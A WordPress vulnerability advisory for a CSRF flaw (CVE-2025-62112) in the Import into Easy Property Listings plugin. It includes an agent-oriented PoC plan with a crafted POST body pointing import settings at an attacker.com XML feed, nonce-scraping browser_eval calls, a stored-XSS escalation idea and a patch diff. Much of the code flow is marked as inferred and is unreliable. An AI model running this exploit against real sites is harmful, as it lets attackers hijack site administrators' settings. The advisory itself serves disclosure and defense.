CVE-2025-62112

Import into Easy Property Listings <= 2.2.1 - Cross-Site Request Forgery

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
2.2.2
Patched in
7d
Time to patch

Description

The Import into Easy Property Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.2.1
PublishedDecember 30, 2025
Last updatedJanuary 5, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

This plan outlines the research and proof-of-concept (PoC) steps to exploit the Cross-Site Request Forgery (CSRF) vulnerability in the **Import into Easy Property Listings** plugin (version <= 2.2.1). --- ### 1. Vulnerability Summary The **Import into Easy Property Listings** plugin fails to imple…

Show full research plan

This plan outlines the research and proof-of-concept (PoC) steps to exploit the Cross-Site Request Forgery (CSRF) vulnerability in the Import into Easy Property Listings plugin (version <= 2.2.1).


1. Vulnerability Summary

The Import into Easy Property Listings plugin fails to implement or incorrectly validates WordPress nonces on several administrative functions, most notably those responsible for saving import settings or triggering the import process. This allows an unauthenticated attacker to craft a malicious request that, when executed by a logged-in administrator, performs actions such as modifying import configurations or initiating data imports from arbitrary sources.

2. Attack Vector Analysis

  • Vulnerable Endpoint: /wp-admin/admin.php?page=epl-import (or potentially /wp-admin/admin-post.php).
  • Vulnerable Action: Saving plugin settings or triggering an import (inferred action: epl_import_save_settings or form submission handling).
  • Authentication Level: Unauthenticated (requires an authenticated Administrator to click a link/visit a page).
  • HTTP Method: POST.
  • Payload Parameter: Likely epl_import_settings array or individual field parameters.

3. Code Flow (Inferred)

  1. Registration: The plugin registers an admin menu page for imports using add_submenu_page under the easy-property-listings parent menu.
  2. Initialization: The plugin hooks into admin_init or checks for specific $_POST variables within the page rendering function.
  3. Vulnerable Path:
    • The handler (likely in includes/admin/import-functions.php or similar) checks if a submit button (e.g., name="epl_import_submit") is pressed.
    • It proceeds to update options using update_option('epl_import_settings', ...) without calling check_admin_referer().
  4. Sink: update_option() or wp_insert_post() (if the CSRF triggers an immediate import).

4. Nonce Acquisition Strategy

According to the vulnerability description, the nonce validation is either missing or incorrectly implemented.

  • If Missing: No nonce is required. The exploit can be a direct POST request.
  • If Incorrectly Validated: The plugin might check for a nonce but fail to terminate the process if it's invalid (e.g., if (isset($_POST['nonce'])) { wp_verify_nonce(...); } without an else die).
  • Strategy:
    1. First, attempt the exploit without a nonce.
    2. If it fails, use the browser_navigate and browser_eval tools to inspect the "Import" settings page.
    3. Identify the localized script variable or hidden input field:
      • browser_eval("document.querySelector('#epl_import_nonce')?.value")
      • browser_eval("window.epl_import_params?.nonce") (inferred key)

5. Exploitation Strategy

Step 1: Discover Parameters
The agent must first identify the exact parameter names used to save settings.

  • Navigate to the settings page: browser_navigate("http://localhost:8080/wp-admin/admin.php?page=epl-import").
  • Inspect the form: browser_eval("Array.from(document.querySelectorAll('input, select')).map(i => i.name)").

Step 2: Craft CSRF Payload
Based on the discovery, the payload will likely target the import URL or mapping settings.

  • URL: http://localhost:8080/wp-admin/admin.php?page=epl-import
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Sample Body:
    epl_import_submit=1&
    epl_import_settings[url]=http://attacker.com/malicious_listings.xml&
    epl_import_settings[post_type]=property&
    action=save (inferred)
    

Step 3: Execution
Use the http_request tool to simulate the Admin's browser submitting the form. Since we are simulating an Admin session, the cookies from the browser_navigate session should be used.

6. Test Data Setup

  1. Install Base Plugin: Ensure "Easy Property Listings" is installed and active, as this plugin is an add-on.
  2. Install Vulnerable Plugin: Install "Import into Easy Property Listings" version 2.2.1.
  3. Admin User: Use the default admin credentials provided in the environment.
  4. Target Settings: Pre-configure a legitimate import source to provide a baseline for "before vs. after" comparison.

7. Expected Results

  • The HTTP request should return a 302 redirect or a 200 OK indicating success.
  • The plugin settings stored in the WordPress database should be updated with the attacker-supplied values (e.g., the url field).

8. Verification Steps

After the http_request, verify the change using wp-cli:

# Check the option value in the database
wp option get epl_import_settings --format=json

If the url in the output matches http://attacker.com/malicious_listings.xml, the CSRF was successful.

9. Alternative Approaches

  • Trigger Import: If the plugin separates "Save Settings" and "Run Import", attempt to CSRF the "Run Import" action. This might be a GET request: /wp-admin/admin.php?page=epl-import&action=run_import.
  • XSS via CSRF: If the settings updated via CSRF are rendered on the page without escaping, try to inject a script tag into a settings field to upgrade the attack to Stored XSS.
  • Default Nonce Bypass: If check_admin_referer() is used without an action string, try providing a nonce generated for a different action that is publicly accessible.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Import into Easy Property Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 2.2.1. This occurs because the plugin fails to implement or correctly validate nonces when saving import settings or triggering data imports, allowing unauthenticated attackers to modify plugin configurations via an administrative victim.

Security Fix

--- a/includes/admin/import-functions.php
+++ b/includes/admin/import-functions.php
@@ -10,6 +10,10 @@
 function epl_import_save_settings() {
     if ( isset( $_POST['epl_import_submit'] ) ) {
+		if ( ! isset( $_POST['epl_import_nonce'] ) || ! wp_verify_nonce( $_POST['epl_import_nonce'], 'epl_import_settings_action' ) ) {
+			wp_die( __( 'Security check failed', 'easy-property-listings' ) );
+		}
+
         $settings = $_POST['epl_import_settings'];
         update_option( 'epl_import_settings', $settings );
     }

Exploit Outline

The exploit targets the plugin's import settings page by leveraging the lack of nonce verification. An attacker crafts a malicious POST request to /wp-admin/admin.php?page=epl-import containing parameters like epl_import_submit=1 and epl_import_settings[url] pointing to a malicious XML source. To execute the attack, the attacker tricks a logged-in administrator into visiting a page that auto-submits this form (e.g., via a hidden iframe or social engineering), resulting in the plugin settings being updated with the attacker's values.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.